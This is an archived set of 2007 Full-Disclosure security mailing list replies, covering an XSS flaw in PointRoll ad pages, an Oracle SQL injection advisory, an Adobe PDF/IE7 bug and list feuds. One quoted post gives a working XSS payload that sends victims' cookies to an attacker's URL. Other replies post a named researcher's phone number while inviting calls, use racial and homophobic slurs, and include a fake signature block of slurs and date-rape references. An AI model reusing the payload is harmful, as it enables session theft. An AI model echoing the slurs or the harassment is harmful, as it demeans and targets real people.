aQSRaMwrU7/rB8mpnXV1e7w86DGaTEoqQWgrU7+DzH79h5u3v03kuYfsJBNQQVSGrWrn IJBOwuBkyuib0PLgSR/t79dhe7tjF9qrRAVm+Y1PhhxI1HnnAMylXoRq6BN3SmS6r8Tn UNaT5RI= =1sTp -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] peace
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 I concur. - -JPwrote I concur. On Fri, 19 Oct 2007 04:35:31 -0400 fabio [EMAIL PROTECTED] wrote: I agree; if it doesn't make any sense to you, feel free to ignore it. To pretend to understand everything everytime is a common pomposity. [EMAIL PROTECTED] wrote: One word replies are unnecessary on the full-disclosure. On Thu, 18 Oct 2007 12:15:52 -0400 Nikolay Kichukov [EMAIL PROTECTED] wrote: so? -Nikolay fabio wrote: https://intranet.usip.org/datacenter/eps/CustomCal.php ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -BEGIN PGP SIGNATURE- Note: This signature can be verified at https://www.hushtools.com/verify Charset: UTF8 Version: Hush 2.5 wpwEAQECAAYFAkcYriQACgkQqTTbVuUWvbLb2AP9EeU1cT+AHVJpsA46LLkHOegS4UAB fAP/YTGcmx5QLpbSLVa8U7dikASs841So8rj7OhnWBALY45x83fFXCEBU4RkNyBFK94c oFMn2G4rz6oYnh32NJuNuT9ifQN5hVZiyBJ5NAlY7q2O9Z4P7B6zuPsnTKUakvNmFrcv wcNz1oY= =CWOD -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] XSS vulnerabilities on eBay, MySpace, CNN.com, etc
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Dear pdp chell, What you do in the bathroom is your own business and does not belong on this mailing list. - -JPtypes but cannot think On Thu, 18 Oct 2007 18:25:24 -0400 jgffgjfgd rewrewrew [EMAIL PROTECTED] wrote: A cross-site scripting vulnerability has been discovered on multiple websites which use ads provided by Pointroll. The following list is a subset of the websites which contain the vulnerability: http://www.cnn.com/pointroll/PointRollAds.htm http://www.myspace.com/pointroll/PointRollAds.htm http://www.friendster.com/pointroll/PointRollAds.htm http://archive.gamespy.com/pointroll/PointRollAds.htm http://www.monster.com/pointroll/PointRollAds.htm http://www.allmusic.com/pointroll/PointRollAds.htm http://www.pcworld.com/pointroll/PointRollAds.htm http://www.10best.com/pointroll/PointRollAds.htm http://www.askmen.com/pointroll/PointRollAds.htm http://pages.ebay.com/pointroll/PointRollAds.html The above pages include a script at pointroll.com which is the root of the vulnerability. The vulnerability arises from the use of location.searchwithout sanitizing the query. The following is a proof of concept which works in Firefox. This should be placed onto the end of any of the above URLs, obviously. [URL] should be replaced by your website URL, such as http://www.foo.com/bar.php, and [LENGTH+1] should be the length of your website URL + 1. ?pub=[URL]?redir=%27%3E%3Cscript%3Ewindow.location= location.search.substring(5,[LENGTH+1]).concat(document.cookie )%3C/script%3Ead=g235e20051011164320 -BEGIN PGP SIGNATURE- Note: This signature can be verified at https://www.hushtools.com/verify Charset: UTF8 Version: Hush 2.5 wpwEAQECAAYFAkcYrf4ACgkQqTTbVuUWvbIx6AP9GD1CxfV7uB331wDT77hUY9WNfFu3 GX2sqs61wW1q8fKC0yKeniLOBDh3Li3y2N32rasERXzIsdSGQNVbSz5dTHULLdAgoHK7 AElY8yxu5/9Qk8KjBNOtDKMtq6PdM/b/U77BSmb1kCTryp9vLLN3dUxBcGgnjHAGX4fA yxbAjtg= =oOy/ -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Most Secure Browser
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 That is hardly sporting. On Thu, 18 Oct 2007 05:23:03 -0400 [EMAIL PROTECTED] [EMAIL PROTECTED] wrote: Could you stfu a moment please thanks , do not reply you're filtered, motherfucker. [EMAIL PROTECTED] wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Thanks bud. Incidentally, we have been seeing a lot of s0ftpj.org posts lately - is your hacker group trying to make a comeback? If so, why? I think r00tabega should return as well! - -JPscene historian is written between my bra and ket lulz! On Wed, 17 Oct 2007 19:54:45 -0400 vecna [EMAIL PROTECTED] wrote: Hi, I am currently tasked with evaluating which webbrowser is the most secure, to be deployed across all machines at the fortune 500 corporation I'm currently working at. Can you, armchair security enthusiast and full-disclosure reader, assist me in this endeavor? I am looking for: 1) Personal favorite browser, firefox, for the plugins support 2) Most secure browser, opera, because is the less used at the moment :) 3) Best browser plugins, mixtab 4) Favorite youtube video, what's matter ? is for a psy profiling analysis ? anyway: http://www.youtube.com/watch?v=K2cYWfq--Nw 5) Best browsing policies a lot of tab (20 - 50) for collect in the day and read after. Thanks and good night. you too. -BEGIN PGP SIGNATURE- Note: This signature can be verified at https://www.hushtools.com/verify Charset: UTF8 Version: Hush 2.5 wpwEAQECAAYFAkcWtPoACgkQqTTbVuUWvbIatwP+I8B3RDKJmVoqK0sOg7hhF1UyV5M c cBG0f2VnONdAMcz1AE6qdPHqRWgfla/hGSBz7ZnDX6RxvHkaxASd5i0rfRq3Omy/f57 U dv1GVxqcKXSlMQmTZY4HKyZJb/2Nkx5qQDjaB/C1Jb1klTuHsN2geLwE3sJKN+gmijZ 0 mz3iOfg= =JzZD -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ . -BEGIN PGP SIGNATURE- Note: This signature can be verified at https://www.hushtools.com/verify Charset: UTF8 Version: Hush 2.5 wpwEAQECAAYFAkcXMcgACgkQqTTbVuUWvbIKIgQArw+Dnj1mT+ZZrN5GxtFzVK5d3L6h Q2GYG5hSHt4kQJju3yOFrVzgIZNv449iltnc+MMmhYR3eZxYw53TDwQbBCQlUEYGdCQq 70eRDctB4vnoO1U2UGd7ff26FQVZDQp9FVRSPbtLnCEpvqYDUKdoT3wzmf9FR5CCk8DU ab0oUpc= =QUID -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Did people power get rid of Gadi Evron from Full-Disclosure?
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 I haven't heard from Gadi since he called Turkey a nation of Muslim terrorists on his blog. Has anyone tried calling him? 703-286-7723, extension 110 . On Wed, 17 Oct 2007 13:43:20 -0400 worried security [EMAIL PROTECTED] wrote: Did people power get rid of Gadi Evron from Full-Disclosure? The security researcher and robot network expert from Israel hasn't been seen on Full-Disclosure mailing list since the What is a 0-day? fallout between the researcher and members of the security community, including me, n3td3v. Concerns are growing in the security community over Evron's health, after a shocking exit from Full-Disclosure mailing list after mass arguments over his comments cross posted between Full-Disclosure and the moderated Bugtraq mailing list. On the n3td3v stance, n3td3v did not want Bugtraq moderators to broadcast his argument on the Securityfocus based mailing list, because it was deemed by n3td3v to be lame and on the bigger picture, the argument wasn't mission critical. n3td3v sees Bugtraq's role to be only for mission critical discussion to protect core infrastructure systems from cyber attacks where economic and public saftey could be at risk in relation with corporate and national security matters. While Gadi Evron was right to leave Full-Disclosure while tensions between security researchers calmed down, n3td3v is now offering Gadi Evron an olive branch to return to Full-Disclosure on the basis he keeps the lame chatter away from Bugtraq and focuses his career of mailing lists postings to be restricted to Full-Disclosure, Funsec, Nanog and any other mailing list accept Bugtraq. Unless he is posting an advisory on behalf of someone else under the SecuriTeam or BeyondSecurity brands, he has no place being on mission critical list Bugtraq at SecurityFocus. So Gadi Evron, no hard feelings, we don't hate you, we just wanted you not to discuss what you discussed on Bugtraq relating to defining 0- day. At the time you may of thought it was a good idea but looking back you must see now how lame it was, unless you have mental health issues. I am your friend Gadi Evron, I respect your work as a robot network expert and I want you to return to Full-Disclosure. If you come back, I will offer you protection, protection to which I already offer to *Valdis*.Kletnieks. What I mean by protection is, if anyone says anything bad about you, I will defend you, as long as you're not being uber lame like you were on Bugtraq over the defining 0-day thread. So Gadi Evron, if you want freeway to speak on Full-Disclosure with n3td3v backing, I will make sure you get full protection from the trolls... its upto you. You can come back to Full-Disclosure and continue being attacked, or you can have my backing and your life will be a whole lot eaiser. If you return to Bugtraq with more uber lameness, then the deal will be cut short, and Full-Disclosure regulars will swallow you up whole. Remember Gadi Evron, power comes at a price and the price is you keep off Bugtraq or expect more public criticism by me, and no protection from me when others decide to criticize you, And don't under estimate the damage done to your self reputation already over matters, so I suggest you take this olive branch and return to Full-Disclosure discussing elite matters regarding cyber security and keeping off Bugtraq is a must see. To be in a position of power on the mailing lists requires the backing of n3td3v, and if you agree then you'll have full power backing by me to continue your cyber politcal agenda on the mailing lists, without n3td3v criticism. Thank you, n3td3v -BEGIN PGP SIGNATURE- Note: This signature can be verified at https://www.hushtools.com/verify Charset: UTF8 Version: Hush 2.5 wpwEAQECAAYFAkcXNCoACgkQqTTbVuUWvbIwDQQAqYgjmUrycYa6tsnPIzu2zZ4Y7VvD OWAcI0+Bm30532CMuxqcmQk/cthv51AADnJypmvC93no5zxbAHkDKt6nsZQcGftbY8rO dL34itjcFnBV6OlaMQGI9w7q/kmmkwWdWFpIQ52/M4uZNmltd3++pW4OBSjyLedhhxne 1c6vPWo= =LYoj -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] .aware eZine (beta edition)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Let us know when the stable version is available. On Thu, 18 Oct 2007 02:08:45 -0400 rattle [EMAIL PROTECTED] wrote: Hello World! I am posting this to inform you about the existence of a little eZine called .aware, over at http://www.awarenetwork.org/etc/ The second issue was just released, namely http://www.awarenetwork.org/etc/beta/ Then, certain people suggested shameles advertising on some mailing lists. So here we go, I did. Now read our exquisite eZine. cheers, rattle -- # Public Key: http://www.awarenetwork.org/usr/rattle.asc python -c print(lambda r:(lambda I:'\n'.join([''.join([(lambda S,R:chr(32+(SR4)*(S+R2*r*(x+y(x**2+y**2,r**2) for x in I]) for y in I]))(range(-4*r,4*r+1)))(6) -BEGIN PGP SIGNATURE- Note: This signature can be verified at https://www.hushtools.com/verify Charset: UTF8 Version: Hush 2.5 wpwEAQECAAYFAkcXZxQACgkQqTTbVuUWvbK1PAQAtMWUL18c3GCdXrPrLEXkcaNlkMoJ 3bFG5uyy253TyAysRzAylDAB38QQTntD5AFnLzJO7fhZtu28rqnqpQGjifZ2nCvkZmDF snyTsfPKIim/l4okBQfKaRQyCR1sDtYfP/DVxRXUfQoNUT3mNRFwtzanLpzpU9yiA1Dw 31gz4KI= =NNC7 -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Your email requires verification.
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Huh? I am a real person! - -JPsometimes retarded, always consistent On Thu, 18 Oct 2007 10:00:57 -0400 [EMAIL PROTECTED] wrote: The message you sent requires you to verify that you are a real live human being and not a spam source. To complete this verification, simply reply to this message and include the following verification code in the subject line: verify#WzcntwThNFUdILsMWgOWTA3mj0COAK7v The headers of the message sent from your address, which triggered this verification process, are show below. If you did not send this message, you are in the unfortunate situation that someone either hijacked your account or spoofes messages from it. From [EMAIL PROTECTED] Thu Oct 18 10:00:57 2007 Received: from [65.39.178.135] (helo=smtp3.hushmail.com) by quagmire.lbccservers.com with esmtp (Exim 4.68) (envelope-from [EMAIL PROTECTED]) id 1IiVvl-0003tS-Gm for [EMAIL PROTECTED]; Thu, 18 Oct 2007 10:00:57 -0400 Received: from smtp3.hushmail.com (localhost.hush.com [127.0.0.1]) by smtp3.hushmail.com (Postfix) with SMTP id BED2E5C015 for [EMAIL PROTECTED]; Thu, 18 Oct 2007 14:00:54 + (UTC) Received: from mailserver5.hushmail.com (mailserver5.hushmail.com [65.39.178.19]) by smtp3.hushmail.com (Postfix) with ESMTP; Thu, 18 Oct 2007 14:00:53 + (UTC) Received: by mailserver5.hushmail.com (Postfix, from userid 65534) id E6F6C22840; Thu, 18 Oct 2007 14:00:52 + (UTC) MIME-Version: 1.0 Date: Thu, 18 Oct 2007 10:00:52 -0400 To: full-disclosure@lists.grok.org.uk,[EMAIL PROTECTED] Cc: Subject: Re: [Full-disclosure] .aware eZine (beta edition) From: [EMAIL PROTECTED] Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 7bit Message-Id: [EMAIL PROTECTED] cheers, rattle -BEGIN PGP SIGNATURE- Note: This signature can be verified at https://www.hushtools.com/verify Charset: UTF8 Version: Hush 2.5 wpwEAQECAAYFAkcXaUwACgkQqTTbVuUWvbJ+igP+MxBoB9K+gyb7FMZXPGrXsvlOjKz2 w0bS8wDvTXpjeXSifAAWR8XDTes53dnbLc56bnLjN2cK6sOrLg+1RRIDWeueUuVMFZIy X9Zox+lsVnwD7JdWXfDy3bDCC7DpazIUMXOOl7Ozv6sy0yNmyVewfY1WevyTT+KOA+qh R3aVqNA= =3z2i -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Netgear SSL312 XSS vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 What? On Wed, 17 Oct 2007 14:15:31 -0400 [EMAIL PROTECTED] wrote: Dear SkyOut, dear Packetstorm team (tedd :)) and dear List. The author brocke a NDA during the releasing of this uber- Advisory. Skyout: What the fuck is wrong with u? Even ignoring our mails... wow? We provided the Router, told him to take a look and he angreed to a NDA. Do I care if you release a XSS? Hell no... But I care if you accapted a NDA because of other internal things. Did you found it by yourself? Well not realy... (We provided a router, told you to take a look for XSS) Is it uber-critical? Not realy either... Could you've released it anyway? Sure.. but you didn't asked and pissed off about 9 different people. Skyout: And for what? For a Advisory about a XSS... great job. Btw: Cryptocrew Members: This guy is seriously NOT trustworthly. I just mention it in case you may consider to hire him This XSS is nothing we wanan sue you for but a NDA is a NDA. And if you come along and tell me Well I didn#t signed anything I#ve at least 7 people handy who can ensure that you angreed to a NDA. A NDA is a NDA that's what you need to learn Skyout, rly.. If you start talking about other internal things be sure we'll consider to take further steps and because you don't answer any mail let me mention that in here And dear list: It's nothing about the XSS but about the NDA he brocke to release it... I'm sure if he wants to take his postings as reference this should get mentioned either Kind regards, Rembrandt (+ the friends you had) p.s. Greets go to t3c0 who noticed the XSS at first but had no time to write about it (and no serious interest). This should get mentioned as well so hopefully some archives update their news. And Skyout.. I told ya you're not the first who analyses it. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -BEGIN PGP SIGNATURE- Note: This signature can be verified at https://www.hushtools.com/verify Charset: UTF8 Version: Hush 2.5 wpwEAQECAAYFAkcXlMoACgkQqTTbVuUWvbKj1gQAjbroKuNR+blbmuCp9OGYo2eiiYTY ruMyi5FDpOYV+oUdEKCrdZLTHL3S5HlfS22SL1BlhuX/UTm+m5LOaUHH0uoGAeHACxKE nHVP/182+KOgEeYox1HzT+dSsh8WkqwUFFLBgl51zV0iaLIJBEsoa7o2zVeJAMln2WOO 3wBEhDs= =8vNh -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] peace
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 One word replies are unnecessary on the full-disclosure. On Thu, 18 Oct 2007 12:15:52 -0400 Nikolay Kichukov [EMAIL PROTECTED] wrote: so? -Nikolay fabio wrote: https://intranet.usip.org/datacenter/eps/CustomCal.php ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -BEGIN PGP SIGNATURE- Note: This signature can be verified at https://www.hushtools.com/verify Charset: UTF8 Version: Hush 2.5 wpwEAQECAAYFAkcXlKcACgkQqTTbVuUWvbIJ8wP+NS8dAavQeGn1oy5d7pyHsCOGICIb tq917imrv09nUCN/IJQYFRJ8pWBT6J6hzhw75lBOwYQdzXXAtvJU4ibybsuGDI+f5qRD EgXg0FswvjxtCCpHyLNqD4WFtnWelw/sNB49WoMCIgdWTjOYBmSfVqYj910bD8HasTUS rz0d0DM= =5NRr -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Zone-H.org: 10 reasons websites get hacked
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 very thought provoking as usual bro thank you for your contributions to our list! On Thu, 18 Oct 2007 15:16:08 -0400 worried security [EMAIL PROTECTED] wrote: On 10/18/07, [EMAIL PROTECTED] full- [EMAIL PROTECTED] wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 I thought the main reasons for intrusion were fun and/or profit. I don't see them on your list anywhere. I think your list sucks. the no.1 threat to corporate and national security is infact the inside job. yep folks, terrorists are actively seeking to trick the job vetting processes for power plants,government etc etc. because the terrorists know the key systems aren't connected to the internet. but after reading media reports, it seems the department of homeland security are thinking if we're not connected to the internet then we're safe. no, even permanently offline systems, still need to be patched from internet threats, because terrorists are actively seeking to get into key infrastructure jobs with portable disks to infect computers with the latest 0-day posted to places such as Full-Disclosure. yep folks, all security pros on here will have seen the dhs propaganda video by now about the turbine getting shutdown with a cyber attack, and the dhs are focusing on internet facing systems, but the real threat to corporate and national security is the inside job of permanently offline systems that the power plants, government etc etc think are safe and don't need patched. what i'm saying is, for example, i'm not saying they use microsoft for key infrastructure systems, but a permanently offline system still needs to be fully patched after every patch tuesday, even though that system is permanently offline and will never ever be connected to the internet. that is my key problem i'm seeing right now by the government in respect of cyber security, they are assuming an internet conenction needs to be there, but that isn't entirely true. if mr joe jobs wanna be terrorist manages to trick your job vetting processes and gets a job with access to the key systems, yes folks, terrorists haven't got time to fiddle around with computers, they will download exploit code from Full-Disclosure type sources and throw it on a portable disk, then go for an inside job social engineering trick and get into a power plant, government etc etc job. so having your permanently offline key infrastructure not patched every patch tuesday for example, is pretty bad, because if your permanently offline systems had been patched, then mr joe jobs wanna be terrorist wouldn't of been able to plug in a portable disk into your systems based on a 0-day exploit originally posted on Full-Disclosure and shut the place down. while the internet is one way to get exploit code into your network, its not the only way. joe jobs wanna be terrorist would rather do an inside job, than fiddle around with computers all day. in short your permanently offline systems still need to be patched every patch tuesday. do the power plants, government etc etc have their patches upto date for permanently offline systems? ;) they assume only internet facing systems need to be patched from internet threats, but that is their delusion not mine. like in this link, http://www.news.com/8301-10784_3-9799403-7.html they keep saying cyber as in internet... but the truth is a terrorist attack to take out key power plants, government etc etc would come from the inside job... the government are wasting their time with the whole cyber security thing, while the exploit code carried on portable disks would originate from internet sources and that that exploit code may of originally needed an internet connection, that is not entirely true if portable disks are used and the joe jobs wanna be terrorists target permanently unpatched, permanently offline systems. did you sit smuggly in your control rooms smiling at that permanently offline system and think, hey, nothing posted on Full-Disclosure can touch this? think again. thanks, n3td3v -BEGIN PGP SIGNATURE- Note: This signature can be verified at https://www.hushtools.com/verify Charset: UTF8 Version: Hush 2.5 wpwEAQECAAYFAkcXuxoACgkQqTTbVuUWvbK8qgP9EdGeONLdpIBNT4CHKVQhlSTPk9rB 4JaPConScV37vF2WRpB+YiT1PLyL473HB4NNz/MENy4NEgs0G1RTVPcA4P3+nFy2ewro 3QdzV9lFyrzgzvCfjCBdk2bjI5nKpSwFSyg8a2AZMm2XqQqQrluS8SjKpp5nmJbUN24h FPuprmU= =h1Uf -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] password plugin for linux?
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ask john hale On Thu, 18 Oct 2007 11:11:24 -0400 . / [EMAIL PROTECTED] wrote: hi all, naive question - but you know how i can load password plugins in window's to capture password changes in the clear. is there any way to achieve the same in linux? atm all i can think of (naively as i said) is to monitor the shadow file or whatever and then insert fav technique here to open the hash. but i am really trying to achieve a near realtime understanding of password changes on the system side, so i can sync them out to apps or systems or whatever. are there pam's out there that do this? or maybe there are rootkits that can do this, that i could canabalise the password stuff out of to pam- ify it. im not looking to write anything nasty here - just think password sync-ing, without like a managed enterprise approach like NIS or LDAP auth or whatever. any thoughts would be appreciated :) david. -BEGIN PGP SIGNATURE- Note: This signature can be verified at https://www.hushtools.com/verify Charset: UTF8 Version: Hush 2.5 wpwEAQECAAYFAkcXxI8ACgkQqTTbVuUWvbI8KgP/cH3JsxfJ3axZ532sN8oJeUIcE2sq RYU4MCVbuZ5nDszdB/8dOtqTCNJmARqBPqn/G6HyedBIY6B8hzHIMV8/giqLpx4oF99g QAuFEEKQNP75UiVb6UAr6d5HLydiNhVh1dz8cl22H2yx8wU1TV/bA5OZja3MxxkOobYX 8xw4swE= =DqfS -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Third-party patch for CVE-2007-3896, UPDATE NOW
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Nice catch. On Wed, 17 Oct 2007 08:16:21 -0400 KJK::Hyperion [EMAIL PROTECTED] wrote: KJK::Hyperion ha scritto: The present patch is dramatically under-tested and it has underwent no quality assurance procedure whatsoever, so please deploy with the greatest care. Indeed, I just found a gruesome memory leak in it. A silly bug, brown paperbag-grade shame. If you installed my patch, upgrade RIGHT THIS MOMENT NOW or slowly die: http://spacebunny.xepher.net/hack/shellexecutefiasco/ For the press guys watching: THIS IS VERY IMPORTANT, more important than the original patch was. I don't expect shitty patch actually shitty to seriously make the big headlines, but, hey, a heads up: there is a good reason Microsoft takes a lot of time to put patches out, after all. I don't do this for the reputation, either: I already made a U-turn on my feelings about the vulnerability, I'm not too proud to admit my mistakes (god knows how big the egos can get in FD) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -BEGIN PGP SIGNATURE- Note: This signature can be verified at https://www.hushtools.com/verify Charset: UTF8 Version: Hush 2.5 wpwEAQECAAYFAkcWACcACgkQqTTbVuUWvbIeJAQAjMVoG2QOfWjppdB4h8nIoXif0mLW B1UQMSl33D268aEePFAVANvrYnhSQMqjWpuwxLPwDjsW0jgGuGahj3wh6K0Y4C7LGZzw cBO2hPLyxTMYw6ZQS/iM0zYgmPuxz+N+dxsrqHFB2CV0JzKha3yPg02HEAVnmXlFV/RS S/iUqf8= =imp6 -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] OMG - I just won the lottery! For real!!11!
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Dear Dude VanWinkle, I find your alias offensive. On Wed, 17 Oct 2007 13:31:32 -0400 nigger johnson [EMAIL PROTECTED] wrote: Although ... I dont remember entering this lottery - because I havent been 18 that long and it wouldnt be legal!? no one cares. next time send your nudes kthx. -- -BEGIN PGP SIGNATURE- Note: This signature can be verified at https://www.hushtools.com/verify Charset: UTF8 Version: Hush 2.5 HACKERShack0d4yc4nh4pp3nTOanyONEfull- disclosureh4ckkfisaniggerEPICLULZ DVDMANlyk3zD1ck101010ri0nSNORTsCOKEmethSHOOTheroinNIGGERbabydrowned lol [EMAIL PROTECTED] phpLOLOL:DLOLHATshifteeisafed+ROOFEYZ/GHBdaterapelul SEKURITYIZSERIOUSBUSINESS =EPICLULZ -END PGP SIGNATURE- -BEGIN PGP SIGNATURE- Note: This signature can be verified at https://www.hushtools.com/verify Charset: UTF8 Version: Hush 2.5 wpwEAQECAAYFAkcWS/sACgkQqTTbVuUWvbJi5AQAqlLlDDF3D4wnTCtQy5vwbyh45PaF 7w+mFQzMLnNcpssRuuhz/JRGFKNAlYhu4aIgGdHs7HKuK0glfH4mn0Z1VujCL8FJ05hK k2jE3YkVtxD59S+asP87eigcYDgYLKWhjD0hK1zX/9MKPgN5oIli9qLzELLOOfsVzl5W M4V/ZEc= =qQcN -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] SQL Injection Flaw in Oracle Workspace Manager
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Yessir. On Wed, 17 Oct 2007 10:27:49 -0400 David Litchfield [EMAIL PROTECTED] wrote: (resend with title...) NGSSoftware Insight Security Research Advisory Name: SQL Injection Flaw in Oracle Workspace Manager Systems Affected: Oracle 10g release 1 and 2, Oracle 9i Severity: High Vendor URL: http://www.oracle.com/ Author: David Litchfield [ [EMAIL PROTECTED] ] Reported: 22nd August 2006 Date of Public Advisory: 17th October 2007 Advisory number: #NISR17102007B Description *** The Workspace Manager in Oracle 10g release 1 and 2 and Oracle 9i is vulnerable to SQL injection. Details *** The Workspace Manager, owned by SYS, contains a package called LT. This package is owned and defined by the SYS user and can be executed by PUBLIC. LT contains a procedure called FINDRICSET which calls the FINDRICSET package in the LTRIC package. This is vulnerable to SQL injection and can be abused by an attacker to gain SYS privileges. Fix Information *** Oracle was alerted to this flaw on the 22nd of August 2006. A patch has now been made available: http://www.oracle.com/technology/deploy/security/critical-patch- updates/cpuo ct2007.html NGSSQuirreL for Oracle, an advanced vulnerability assessment scanner designed specifically for Oracle, can be used to accurately determine whether your servers are vulnerable to this flaw. More information about NGSSQuirreL for Oracle can be found here: http://www.ngssoftware.com/products/database-security/ngs-squirrel- oracle.ph p About NGSSoftware * NGSSoftware develops vulnerability assessment and compliancy tools for database servers including Oracle, Microsoft SQL Server, DB2, Sybase and Informix. Headquartered in the United Kingdom NGS has offices in London, St. Andrews (UK), Brisbane, and Perth (Australia) and Seattle in the United States; NGSConsulting provide services to some of the largest and most demanding organizations around the globe. http://www.ngssoftware.com/ Telephone +44 208 401 0070 Fax +44 208 401 0076 [EMAIL PROTECTED] -- E-MAIL DISCLAIMER The information contained in this email and any subsequent correspondence is private, is solely for the intended recipient(s) and may contain confidential or privileged information. For those other than the intended recipient(s), any disclosure, copying, distribution, or any other action taken, or omitted to be taken, in reliance on such information is prohibited and may be unlawful. If you are not the intended recipient and have received this message in error, please inform the sender and delete this mail and any attachments. The views expressed in this email do not necessarily reflect NGS policy. NGS accepts no liability or responsibility for any onward transmission or use of emails and attachments having left the NGS domain. NGS and NGSSoftware are trading names of Next Generation Security Software Ltd. Registered office address: 52 Throwley Way, Sutton, SM1 4BF with Company Number 04225835 and VAT Number 783096402 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -BEGIN PGP SIGNATURE- Note: This signature can be verified at https://www.hushtools.com/verify Charset: UTF8 Version: Hush 2.5 wpwEAQECAAYFAkcWTCAACgkQqTTbVuUWvbKxOgP9ExWHtaYpV3AddcIg4GjBW+ebDa+A PQaXD1NWux8rCNhxFfSi29wH3Uy9EyTuhsst+OYT9az+Jge2wDkHLQ+DMuLz8f4ghvkq cBw1M8ugNwm0t3Lz2o9sbZbabpRvC2c8KCN7clEqzStAWqRh0O9GgLd8mnUHxNspDN1s 0Tn8ZJg= =rhgC -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] 0-day PDF exploit
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 They are just covering their asses in case someone figures out a scenario where this bug is actually useful, and tries going on a media whoring campaign talking about how evil Adobe is for not originally rating the vulnerability higher. You bunch of whiny, prissy homo fucks. On Wed, 17 Oct 2007 11:26:15 -0400 Justin Klein Keane [EMAIL PROTECTED] wrote: Adobe has a work around (but doesn't seem to have a fix yet) for this vulnerability (which they categorize as critical). They also state (and testing seems to validate) that impact is limited to Windows XP machines with IE 7. http://www.adobe.com/support/security/advisories/apsa07-04.html Justin C. Klein Keane Sr. Programmer Analyst and Information Security Specialist University of Pennsylvania School of Arts and Sciences Computing 3600 Market St. Philadelphia, PA 19104 [EMAIL PROTECTED] wrote: Why everybody said it is a zero day about PDF? it's just a fault in IE7, or just want to make a big media hit? real PDF zero day will exists in the PDF's file format, or some Adobe's expanded functions. Actually, it's about PDF *and* IE7. Both are at fault, and if either one of them was doing the right thing, the exploit would fail. The first fault is Adobe's. Because it's their code that first acquires the input from the attacker, it's their job IMHO to validate it properly, but they don't. Instead, they turn around and tell Windows to open the bogus URI. The second fault is IE7's. The protocol handler used to fail gracefully by rejecting this kind of malformed URI, but now it doesn't. The new behavior is to turn around and call ShellExecute() with data taken from the URI. I prefer to think of it this way: Adobe's code has been doing the wrong thing for years, and they've gotten lucky. But now, a new bug in IE7 has come along which makes the old bug in Adobe's code exploitable. - Eric ___ Full-Disclosure - We believe in 